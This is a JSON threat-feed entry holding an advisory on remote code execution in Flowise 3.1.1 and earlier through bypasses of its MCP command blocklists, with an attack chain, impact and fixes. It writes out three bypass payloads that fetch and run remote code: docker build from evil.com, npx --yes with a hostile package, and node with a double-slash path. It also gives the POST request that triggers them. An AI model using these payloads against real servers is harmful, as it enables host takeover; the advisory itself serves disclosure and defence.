{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/flowise-components--3.1.1/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["flowise (\u003c= 3.1.1)","flowise-components (\u003c= 3.1.1)"],"_cs_severities":["high"],"_cs_tags":["execution","remote code execution","flowise"],"_cs_type":"advisory","_cs_vendors":["npm"],"content_html":"\u003cp\u003eFlowise versions 3.1.1 and earlier contain multiple security vulnerabilities within the MCP (Model Chain Pipeline) feature that can be exploited to achieve remote code execution (RCE). These vulnerabilities stem from insufficient input validation and inadequate blocklists for commands executed by the system. An attacker with a Flowise account, or API access with view/update permissions for chatflows, can configure the MCP tool to bypass security restrictions. The three identified bypass methods involve exploiting weaknesses in the docker build command, the npx command, and the node command. Successful exploitation allows an attacker to execute arbitrary commands on the Flowise host machine.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to a Flowise account with any role or API access with view/update permissions for chatflows.\u003c/li\u003e\n\u003cli\u003eAttacker configures the Custom MCP Server using one of the three following methods:\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocker Build Bypass:\u003c/strong\u003e Provides \u003ccode\u003e{\u0026quot;command\u0026quot;:\u0026quot;docker\u0026quot;,\u0026quot;args\u0026quot;:[\u0026quot;build\u0026quot;,\u0026quot;https://evil.com/\u0026quot;]}\u003c/code\u003e as the Custom MCP Server configuration, bypassing the \u003ccode\u003evalidateCommandFlags\u003c/code\u003e blocklist.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNPX \u0026ndash;yes Bypass:\u003c/strong\u003e Provides \u003ccode\u003e{\u0026quot;command\u0026quot;:\u0026quot;npx\u0026quot;,\u0026quot;args\u0026quot;:[\u0026quot;--yes\u0026quot;,\u0026quot;malicious-package\u0026quot;]}\u003c/code\u003e to bypass the \u003ccode\u003evalidateCommandFlags\u003c/code\u003e blocklist.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNode Command Bypass:\u003c/strong\u003e Provides \u003ccode\u003e{\u0026quot;command\u0026quot;:\u0026quot;node\u0026quot;,\u0026quot;args\u0026quot;:[\u0026quot;//evil.com/malicious.js\u0026quot;]}\u003c/code\u003e to bypass the \u003ccode\u003evalidateArgsForLocalFileAccess\u003c/code\u003e security restrictions by using a double slash at the start of the path.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eFor the Docker Build bypass, \u003ccode\u003edocker build \u0026lt;remote-URL\u0026gt;\u003c/code\u003e pulls a Dockerfile from a remote address specified by the attacker and executes the \u003ccode\u003eRUN\u003c/code\u003e instructions within it, enabling container escape and host control.\u003c/li\u003e\n\u003cli\u003eFor the NPX \u0026ndash;yes bypass, \u003ccode\u003enpx --yes malicious-package\u003c/code\u003e automatically agrees to install and execute a malicious npm package, leading to RCE on the server.  The attacker hosts a malicious package with a postinstall script.\u003c/li\u003e\n\u003cli\u003eFor the Node Command bypass, the node process loads and executes arbitrary code from a local file whose path begins with \u003ccode\u003e//\u003c/code\u003e, bypassing the \u003ccode\u003evalidateArgsForLocalFileAccess\u003c/code\u003e restrictions.  The attacker uploads a malicious javascript file.\u003c/li\u003e\n\u003cli\u003eAttacker triggers the execution of the configured MCP via a \u003ccode\u003ePOST\u003c/code\u003e request to \u003ccode\u003e/api/v1/prediction/{chatflows_id}\u003c/code\u003e with the body \u003ccode\u003e{\u0026quot;question\u0026quot;: \u0026quot;1\u0026quot;}\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe configured command (docker, npx, or node) is executed with the attacker-supplied arguments on the Flowise server.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves remote code execution (RCE) on the Flowise server, potentially leading to full control of the host machine.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities allows attackers to execute arbitrary commands on the Flowise server. This can lead to complete system compromise, data theft, and disruption of services. This vulnerability affects Flowise installations using vulnerable versions of the \u003ccode\u003eflowise\u003c/code\u003e and \u003ccode\u003eflowise-components\u003c/code\u003e packages, potentially impacting any organization using Flowise for managing model chains.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to a patched version of Flowise that addresses the MCP security bypasses.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rules to detect potential exploitation attempts of these vulnerabilities.\u003c/li\u003e\n\u003cli\u003eReview and harden the \u003ccode\u003evalidateCommandFlags\u003c/code\u003e and \u003ccode\u003evalidateArgsForLocalFileAccess\u003c/code\u003e functions within Flowise to prevent future bypasses. Refer to the vulnerable code snippets in the Overview section.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious \u003ccode\u003edocker build\u003c/code\u003e commands originating from Flowise servers, especially those pulling Dockerfiles from untrusted sources. The \u0026ldquo;Docker Build RCE Attempt\u0026rdquo; Sigma rule can help with this.\u003c/li\u003e\n\u003cli\u003eBlock the execution of npx with the \u003ccode\u003e--yes\u003c/code\u003e argument. The \u0026ldquo;NPX Yes RCE Attempt\u0026rdquo; Sigma rule can help detect this behavior.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-14T15:00:25Z","date_published":"2026-05-14T15:00:25Z","id":"https://feed.craftedsignal.io/briefs/2026-05-flowise-mcp-rce/","summary":"Flowise versions 3.1.1 and earlier are vulnerable to remote code execution (RCE) due to multiple MCP security bypasses, allowing attackers to execute arbitrary commands on the Flowise server by exploiting blocklist weaknesses in docker build, npx, and node command handling.","title":"Flowise MCP Security Bypass Leads to Remote Code Execution","url":"https://feed.craftedsignal.io/briefs/2026-05-flowise-mcp-rce/"}],"language":"en","title":"CraftedSignal Threat Feed — Flowise-Components (\u003c= 3.1.1)","version":"https://jsonfeed.org/version/1.1"}